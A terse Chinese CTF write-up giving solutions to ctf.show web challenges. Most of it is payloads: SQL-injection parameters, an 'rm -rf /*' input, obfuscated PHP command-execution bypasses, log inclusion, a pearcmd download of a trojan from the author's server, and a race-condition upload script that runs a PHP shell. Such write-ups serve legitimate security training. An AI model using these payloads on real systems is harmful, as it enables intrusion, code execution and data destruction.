随便写一下
WEB1
?id='1000'
?id=-1 or id=1000
WEB2
?id='1000'
WEB3
?id='1000'
WEB4
?id='1000'
WEB5
?id=~~1000
WEB6
?id=~~1000
WEB7
?id=0b1111101000
WEB8
?flag=rm -rf /*
WEB9
?c=highlight_file('config.php');
WEB10
?c=passthru(%22cat%20config.php%22);
WEB11
?c=$a='sys';$b='tem';$d=$a.$b;$e=ca;$d($e."t config.php");
再查看源代码
WEB12
?c=$a=base64_decode("c3lzdGVt");$b=base64_decode("dGFjIGNvbmZpZy5waHA=");$a($b);
WEB13
?c=passthru(base64_decode('dGFjIGNvbmZpZy5waHA='))?>
WEB14
?c=echo `$_GET[a]`?>&a=tac config.php
WEB15
?c=include%20$_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php
WEB16
查md5
?c=36d
WEB17-21
日志包含
下面是蚁件连接地址
http://2f06eecf-c349-471c-b2a0-4b77ee150725.challenge.ctf.show/?c=/var/log/nginx/access.log
WEB22
自己服务器上弄一个木马e.php
<?php
echo "<?php system('tac 36d.php');?>";
?>
让靶机下载这个木马
http://xxxx/?c=pearcmd&+download+http://xxxxxxxxx/e.php
最后直接访问这个木马
http://xxxxx/e.php
获得百分之百的快乐
?1=>nl
?1=*
WEB23
把网上传的最常见的脚本的一部分内容改了一下
ts = int(time.mktime(time.strptime(txt[8:22], "%Y%m%d%H%M%S")))
fname = time.strftime("%Y%m%d%H%M%S", time.localtime(ts + 1))
改成下面内容,更好理解
fname=str(int(txt[8:22])+1)
import requests,time,threading
subaddr = "http://d6fbf751-f250-4d8b-89dc-9da74c4ea044.challenge.ctf.show/"
def newThread(fun,*args):
return threading.Thread(target=fun, args=args)
def execphp(fname):
r = requests.get(subaddr + "uploads/" + fname + ".php")
x = r.text
if len(x) > 0 and "404 Not Found" not in x and "容器已过期" not in x:
print(x)
def check(fname):
for i in range(100,400):
# 每个文件名单起一个线程
newThread(execphp, fname + str(i)).start()
def upload():
while True:
file_data = {'file':('anything.php',"<?php system(\"ls -l ../\");?>".encode())}
r = requests.post(subaddr+"upload.php",files=file_data)
txt = r.text
print("uploaded:",txt)
# 用本次的文件名推算下一次的文件名,相差sleep一次的时间间隔
fname=str(int(txt[8:22])+1)
# 单起一个线程,爆破下一次upload的文件名 uploaded: uploads/20220818222707124.php
newThread(check, fname).start()
if __name__ == '__main__':
upload()
WEB24
import requests,time,threading
subaddr = "http://d6fbf751-f250-4d8b-89dc-9da74c4ea044.challenge.ctf.show/"
def newThread(fun,*args):
return threading.Thread(target=fun, args=args)
def execphp(fname):
r = requests.get(subaddr + "uploads/" + fname + ".php")
x = r.text
if len(x) > 0 and "404 Not Found" not in x and "容器已过期" not in x:
print(x)
def check(fname):
for i in range(100,400):
# 每个文件名单起一个线程
newThread(execphp, fname + str(i)).start()
def upload():
while True:
file_data = {'file':('anything.php',"<?php system(\"ls -l ../\");?>".encode())}
r = requests.post(subaddr+"upload.php",files=file_data)
txt = r.text
print("uploaded:",txt)
# 用本次的文件名推算下一次的文件名,相差sleep一次的时间间隔
fname=str(int(txt[8:22])+3)
# 单起一个线程,爆破下一次upload的文件名 uploaded: uploads/20220818222707124.php
newThread(check, fname).start()
if __name__ == '__main__':
upload()